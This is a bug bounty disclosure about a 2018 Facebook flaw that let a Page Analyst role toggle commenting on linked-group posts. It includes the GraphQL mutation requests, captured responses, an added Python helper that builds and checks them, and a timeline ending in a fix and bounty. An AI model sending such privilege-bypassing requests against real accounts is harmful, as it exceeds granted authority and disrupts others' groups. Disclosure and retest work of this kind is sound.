Page admins can link a group to their Page. When they do, the Page admin gets the admin privilege in the group, editors and moderators get the moderator privilege, and the two other roles (Advertiser and Analyst) are meant to be read-only. Those read-only roles were not validated properly on the group side: with only the Analyst role on a Page, it was possible to turn commenting on or off for a post in the linked group.
The GraphQL request used to turn off commenting on a post was:
https://graph.facebook.com/v2.12/graphql?variables={"0":{"client_mutation_id":"","PAGE ID":"","feedback_id":"<base64 encoded post ID>"}}&doc_id=1543355012409944&access_token=<PAGE ACCESS TOKEN>
Response:
{
"data": {
"feedback_disable_commenting": {
"feedback": {
"id": "ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz",
"legacy_api_post_id": "821695251333877_947704812066253",
"can_viewer_comment": false,
"have_comments_been_disabled": true,
"comments_disabled_notice": {
"text": "You turned off commenting for this post.",
"ranges": [],
"delight_ranges": []
}
}
}
}
}
Turning commenting back on for a post:
https://graph.facebook.com/v2.12/graphql?variables={"0":{"client_mutation_id":"","PAGE ID":"","feedback_id":"<base64 encoded post ID>"}}&doc_id=1654699771253093&access_token=<PAGE ACCESS TOKEN>
Response:
{
"data": {
"feedback_enable_commenting": {
"feedback": {
"id": "ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz",
"legacy_api_post_id": "821695251333877_947704812066253",
"can_viewer_comment": true,
"have_comments_been_disabled": false,
"comments_disabled_notice": {
"text": "Commenting has been turned off for this post.",
"ranges": [],
"delight_ranges": []
}
}
}
}
}
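The following helper is an added example for reproducing and checking the two requests above; it is not part of the original report. It derives the feedback_id from the post id (the id in the responses above, ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz, is base64 of feedback:947704812066253, the numeric half of legacy_api_post_id), builds both mutation URLs in the shape shown, and parses a response to tell a successful toggle from a refusal. The endpoint, doc_ids and response fields come from the requests above; the page id, token and the refusal response are constructed for the example, and the "PAGE ID" variable key is reproduced exactly as it appears in the original request.

```python
import base64
import json
from urllib.parse import urlencode

GRAPHQL_ENDPOINT = "https://graph.facebook.com/v2.12/graphql"
# Persisted-query ids taken from the two requests in the writeup.
DOC_ID_DISABLE_COMMENTING = "1543355012409944"
DOC_ID_ENABLE_COMMENTING = "1654699771253093"


def feedback_id_for_post(legacy_post_id: str) -> str:
    """Build the opaque feedback_id the mutation expects.

    legacy_api_post_id has the form <page id>_<post id>; the feedback_id
    returned by the API is base64("feedback:<post id>"), so it can be
    derived without a separate lookup.
    """
    numeric_post_id = legacy_post_id.split("_")[-1]
    return base64.b64encode(f"feedback:{numeric_post_id}".encode()).decode()


def build_mutation_url(doc_id: str, page_id: str, legacy_post_id: str, access_token: str) -> str:
    """Reproduce the request shape from the writeup: variables as JSON in the query string."""
    variables = {
        "0": {
            "client_mutation_id": "",
            "PAGE ID": page_id,  # key kept as it appears in the original request
            "feedback_id": feedback_id_for_post(legacy_post_id),
        }
    }
    query = urlencode({
        "variables": json.dumps(variables, separators=(",", ":")),
        "doc_id": doc_id,
        "access_token": access_token,
    })
    return f"{GRAPHQL_ENDPOINT}?{query}"


def commenting_state(response_json: str):
    """Return True if comments are now disabled, False if enabled, None if the mutation was refused.

    A correctly authorised endpoint should answer a read-only role with an
    `errors` array and no mutation payload; the vulnerable behaviour is a
    feedback object whose have_comments_been_disabled flag has been flipped.
    """
    body = json.loads(response_json)
    if body.get("errors") or not body.get("data"):
        return None
    (payload,) = body["data"].values()  # exactly one mutation field per response
    return bool(payload["feedback"]["have_comments_been_disabled"])


# Sample responses: the first two are the ones captured in the writeup (trimmed to
# the fields used here); the refusal is constructed to show the expected safe answer.
DISABLE_RESPONSE = json.dumps({"data": {"feedback_disable_commenting": {"feedback": {
    "id": "ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz",
    "legacy_api_post_id": "821695251333877_947704812066253",
    "can_viewer_comment": False,
    "have_comments_been_disabled": True}}}})
ENABLE_RESPONSE = json.dumps({"data": {"feedback_enable_commenting": {"feedback": {
    "id": "ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz",
    "legacy_api_post_id": "821695251333877_947704812066253",
    "can_viewer_comment": True,
    "have_comments_been_disabled": False}}}})
REFUSED_RESPONSE = json.dumps({"data": None, "errors": [
    {"message": "(constructed example) caller lacks moderator privilege on this group"}]})


if __name__ == "__main__":
    post = "821695251333877_947704812066253"
    page = "821695251333877"      # constructed: the page half of legacy_api_post_id
    token = "PAGE_ACCESS_TOKEN"   # constructed placeholder; use a token of a read-only role to retest
    for name, doc_id in (("disable", DOC_ID_DISABLE_COMMENTING), ("enable", DOC_ID_ENABLE_COMMENTING)):
        print(name, build_mutation_url(doc_id, page, post, token))
    for label, resp in (("disable", DISABLE_RESPONSE), ("enable", ENABLE_RESPONSE), ("refused", REFUSED_RESPONSE)):
        print(label, "->", commenting_state(resp))
```

To retest after a fix, send the disable URL with a token whose Page role is Advertiser or Analyst: commenting_state should return None (the mutation refused), and a second read of the post should show have_comments_been_disabled unchanged.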
Video PoC:
Timeline:
Thursday, March 22, 2018 at 8:00pm: Report Sent
Friday, April 20, 2018 at 11:11am: Facebook responded, saying they had found the issue internally and fixed it.
Wednesday, May 23, 2018 at 12:47am: $500 Bounty